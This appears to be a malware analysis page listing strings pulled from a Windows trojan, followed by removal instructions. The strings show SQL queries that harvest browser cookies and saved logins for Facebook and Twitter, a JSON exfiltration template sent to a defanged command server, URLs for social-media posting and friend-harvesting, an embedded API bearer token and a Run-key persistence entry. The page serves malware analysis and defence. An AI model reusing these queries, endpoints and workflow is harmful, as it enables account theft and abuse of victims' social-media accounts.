sqlite3_total_changes
sqlite3_trace
sqlite3_transfer_bindings
sqlite3_update_hook
sqlite3_uri_boolean
sqlite3_uri_int64
sqlite3_uri_parameter
sqlite3_user_add
sqlite3_user_authenticate
sqlite3_user_change
sqlite3_user_data
sqlite3_user_delete
sqlite3_value_blob
sqlite3_value_bytes
sqlite3_value_bytes16
sqlite3_value_double
sqlite3_value_dup
sqlite3_value_free
sqlite3_value_int
sqlite3_value_int64
sqlite3_value_numeric_type
sqlite3_value_subtype
sqlite3_value_text
sqlite3_value_text16
sqlite3_value_text16be
sqlite3_value_text16le
sqlite3_value_type
sqlite3_vfs_find
sqlite3_vfs_register
sqlite3_vfs_unregister
sqlite3_vmprintf
sqlite3_vsnprintf
sqlite3_vtab_config
sqlite3_vtab_on_conflict
sqlite3_wal_autocheckpoint
sqlite3_wal_checkpoint
sqlite3_wal_checkpoint_v2
sqlite3_wal_hook
sqlite3_win32_is_nt
sqlite3_win32_mbcs_to_utf8
sqlite3_win32_set_directory
sqlite3_win32_sleep
sqlite3_win32_utf8_to_mbcs
sqlite3_win32_write_debug
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
Software\\Microsoft\\Windows\\CurrentVersion\\Run
\\.\PhysicalDrive0000000-000000-000000-000000-000000
@Windows 10
Windows Server Technical Preview
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8
Windows Server 2012
Windows 8.1
Windows Server 2012 R2
Windows 2000
Windows XP
Windows Server 2003 R2
Windows Storage Server 2003
Windows Home Server
Windows XP Professional x64 Edition
Windows Server 2003
Windows 98
Web Server Edition
{"code":"{Code}","type":{type},"ver":"{Ver}","browser":"{Browser}","user":"{User}","pass":"{Pass}","cookies":"{Cookies}","aid":{Aid},"utype":{uType}}
{Pass}
hXXp://api.faceboolad.com/api//send
WinHttp.WinHttpRequest.5.1
hXXp://VVV.facebook.com
Server-Key
Chrome
Firefox
facebook.com
select name,encrypted_value from cookies where host_key = '.facebook.com'
\Local\Google\Chrome\User Data
\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies
\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies
\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies
hXXps://VVV.facebook.com/
select name,value from moz_cookies where host = '.facebook.com'
\Roaming\Mozilla\Firefox\Profiles
\cookies.sqlite
Login Data
select username_value, password_value, signon_realm from logins
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.59 Safari/537.36
hXXp://api.faceboolad.com/api//GetTask?code=
[ImageUrl]
Dalvik/2.1.0 (Linux; U; Android 6.0.1; MI NOTE LTE MIUI/6.8.11)
twitter.com
select name,encrypted_value from cookies where host_key = '.twitter.com'
hXXps://VVV.twitter.com/
select name,value from moz_cookies where host = '.twitter.com'
hXXps://m.facebook.com/
hXXps://VVV.facebook.com/settings
VBScript.RegExp
hXXps://m.facebook.com/composer/mbasic/?av={c_user}&refid=8
fb_dtsg={fb_dtsg}&charset_test=€,´,€,´,水,Д,Є&privacyx={privacyx}&target={c_user}&c_src=feed&cwevent=composer_entry&referrer=feed&ctype=inline&cver=amber&rst_icv=&xc_message=&view_privacy=
hXXps://m.facebook.com/home.php
hXXps://m.facebook.com
hXXps://VVV.facebook.com/notes/composer/photos/?thumb_height=116&thumb_width=149&av={c_user}&dpr=1
hXXps://m.facebook.com/composer/mbasic/?av={c_user}&refid=7&ref=wizard
fb_dtsg={fb_dtsg}&charset_test=€,´,€,´,水,Д,Є&privacyx={privacyx}&target={c_user}&c_src=feed&cwevent=composer_entry&referrer=feed&ctype=inline&cver=amber&rst_icv=&xc_message={text}&view_post=发布
hXXps://m.facebook.com/home.php?ref=wizard&_rdr
hXXps://m.facebook.com/composer/mbasic/?csid=94c178a8-8774-424a-8c53-9994984e3fba&incparms[0]=xc_message&av={c_user}
------WebKitFormBoundarydDyitWHTKuC21cBZ
€,´,€,´,水,Д,Є
94c178a8-8774-424a-8c53-9994984e3fba
web_m_touch
发布
Content-Disposition: form-data; name="file0"; filename="test.jpg"
------WebKitFormBoundarydDyitWHTKuC21cBZ--
hXXps://m.facebook.com/composer/mbasic/?mnt_query&csid=94c178a8-8774-424a-8c53-9994984e3fba
multipart/form-data; boundary=----WebKitFormBoundarydDyitWHTKuC21cBZ
hXXps://m.facebook.com/home.php?stype=phs&sk=live&gfid=
hXXps://VVV.facebook.com/notes/composer/?dpr=1
hXXps://VVV.facebook.com
hXXps://VVV.facebook.com/notes
hXXps://VVV.facebook.com/notes/composer/upload/coverphoto/?media_type=photo&note_id={NoteId}&__a=1&fb_dtsg={fb_dtsg}
------WebKitFormBoundaryy1orVA8O3OLUfzBE
Content-Disposition: form-data; name="file"; filename="test.jpg"
------WebKitFormBoundaryy1orVA8O3OLUfzBE--
multipart/form-data; boundary=----WebKitFormBoundaryy1orVA8O3OLUfzBE
hXXps://VVV.facebook.com/notes/composer/publish/?av={c_user}&dpr=1
{"offset":{offset},"length":{length},"key":{Index}}
{URL}
"{Index}":{"id":null,"type":7,"data":{"url":"{URL}"}}
hXXps://m.facebook.com/friends/center/friends/?ppk={page}&tid=u_u_0
hXXps://m.facebook.com/friends/center/friends/?mff_nav=1&fb_ref=fbm&ref=bookmarks
XMLHttpRequest
hXXps://mobile.twitter.com/settings
hXXps://api.twitter.com/1.1/users/lookup.json?include_blocking=true&include_blocked_by=true&include_can_dm=true&include_followed_by=true&include_mute_edge=true&screen_name=
Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs=1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA
hXXps://api.twitter.com/1.1/friendships/create.json
hXXps://api.twitter.com/1.1/statuses/update.json
&media_type=image/jpeg
hXXps://upload.twitter.com/i/media/upload.json?command=INIT&total_bytes=
hXXps://mobile.twitter.com/compose/tweet
hXXps://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=
------WebKitFormBoundaryUbnK77J90KHiGB65
------WebKitFormBoundaryUbnK77J90KHiGB65--
hXXps://mobile.twitter.com
multipart/form-data; boundary=----WebKitFormBoundaryUbnK77J90KHiGB65
hXXps://upload.twitter.com/i/media/upload.json?command=FINALIZE&media_id=
select count(*) from sqlite_master where type='table' and tbl_name='
select tbl_name from sqlite_master where type='table' and tbl_name<>'sqlite_sequence'
application/x-www-form-urlencoded
SetClientCertificate
TempObj=JSON.parse(str);
var obj=JSON.parse(str);
Lobj.push(obj);
return Lobj.length;
function GetAllKey(){
Lobj = JSON.parse(str);
var str=JSON.stringify(Lobj);
return Lobj.str;
if (typeof Date.prototype.toJSON !== 'function') {
Date.prototype.toJSON = function (key) {
return isFinite(this.valueOf())
? this.getUTCFullYear()   '-'  
f(this.getUTCMonth()   1)   '-'  
f(this.getUTCDate())   'T'  
f(this.getUTCHours())   ':'  
f(this.getUTCMinutes())   ':'  
f(this.getUTCSeconds())   'Z'
String.prototype.toJSON =
Number.prototype.toJSON =
Boolean.prototype.toJSON = function (key) {
return this.valueOf();
'"' : '\\"',
'\\': '\\\\'
escapable.lastIndex = 0;
return escapable.test(string) ? '"'   string.replace(escapable, function (a) {
: '\\u'   ('0000'   a.charCodeAt(0).toString(16)).slice(-4);
function str(key, holder) {
k, // The member key.
value = holder[key];
typeof value.toJSON === 'function') {
value = value.toJSON(key);
value = rep.call(holder, key, value);
if (Object.prototype.toString.apply(value) === '[object Array]') {
length = value.length;
v = partial.length === 0
? '[\n'   gap   partial.join(',\n'   gap)   '\n'   mind   ']'
: '['   partial.join(',')   ']';
length = rep.length;
partial.push(quote(k)   (gap ? ': ' : ':')   v);
if (Object.prototype.hasOwnProperty.call(value, k)) {
v = partial.length === 0
? '{\n'   gap   partial.join(',\n'   gap)   '\n'   mind   '}'
: '{'   partial.join(',')   '}';
if (typeof JSON.stringify !== 'function') {
JSON.stringify = function (value, replacer, space) {
typeof replacer.length !== 'number')) {
throw new Error('JSON.stringify');
if (typeof JSON.parse !== 'function') {
JSON.parse = function (text, reviver) {
function walk(holder, key) {
var k, v, value = holder[key];
if (Object.prototype.hasOwnProperty.call(value, k)) {
return reviver.call(holder, key, value);
cx.lastIndex = 0;
if (cx.test(text)) {
text = text.replace(cx, function (a) {
('0000'   a.charCodeAt(0).toString(16)).slice(-4);
.test(text.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g, '@')
.replace(/"[^"\\\n\r]*"|true|false|null|-?\d (?:\.\d*)?(?:[eE][ \-]?\d )?/g, ']')
.replace(/(?:^|:|,)(?:\s*\[) /g, ''))) {
throw new SyntaxError('JSON.parse');
JSON.stringify(Lobj['
Lobj.push("
Lobj.push(
Lobj.push('
Lobj.length
JSON.stringify(Lobj[
Lobj.splice(
JSON.stringify(Lobj
GetAllKey
var keyStr = "ABCDEFGHIJKLMNOP"  
for (var i=0; i<strNative.length; i  ) {
var c = strNative.charAt(i);
var cc = strNative.charCodeAt(i);
return hexChars.charAt(nH)   hexChars.charAt(nL);
var posTo = strAscii.indexOf("\\u", posFrom);
output  = strAscii.substring(posFrom, posTo);
output  = toChar(strAscii.substr(posTo, 6));
posTo = strAscii.indexOf("\\u", posFrom);
output  = strAscii.substr(posFrom);
if (str.substr(0, 2) != "\\u") return str;
for (var i=2; i<str.length; i  ) {
var cc = str.charCodeAt(i);
return String.fromCharCode(code);
function URlEncode(temp){return(encodeURIComponent(temp));}
function URlDecode(temp){return(decodeURIComponent(temp));}
function Utf8Decode(temp){return(URlDecode(decodeURI(temp)));}
URlDecode
URlEncode
Adodb.Stream
kernel32.dll
advapi32.dll
shlwapi.dll
ntdll.dll
Kernel32.dll
ole32.dll
shell32.dll
crypt32.dll
wininet.dll
psapi.dll
RegOpenKeyA
RegCloseKey
MsgWaitForMultipleObjects
program internal error number is %d.
:"%s"
:"%s".
c:\%original file name%.exe
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
USER32.DLL
operator
CRYPT32.dll
ADVAPI32.dll
PSAPI.DLL
WININET.dll
8ole32.dll
SHLWAPI.dll
SHELL32.dll
USER32.dll
OLEAUT32.dll
ForceRemove {148D5E31-0D7E-44EE-B5C2-291B822351EA} = s 'TheGfxUILauncher Class'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{D6DCE90A-557C-40D8-ABE9-BD1336674C95}'
stdole2.tlbWWW
Created by MIDL version 8.00.0603 at Mon Apr 04 10:47:17 2016
mscoree.dll
KERNEL32.DLL
WUSER32.DLL
SQLite
SQLite3 Database Library
3.9.2.1
SQLite3
Error at initialization of bundled DLL: %s
Error at hooking API "%S"
Dumping first %d bytes:
6.15.10.4425
GFXUIEX.EXE

%original file name%.exe_2340_rwx_00542000_0011C000:

Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
GetProcessWindowStation
USER32.DLL
operator
c:\%original file name%.exe
KERNEL32.DLL
mscoree.dll
Error at initialization of bundled DLL: %s
Error at hooking API "%S"
Dumping first %d bytes:

%original file name%.exe_2340_rwx_0076D000_00001000:

WININET.dll
user32.dll

%original file name%.exe_2340_rwx_00772000_00001000:

SHLWAPI.dll


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "%original file name%.exe -start" = "c:\%original file name%.exe -start"

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
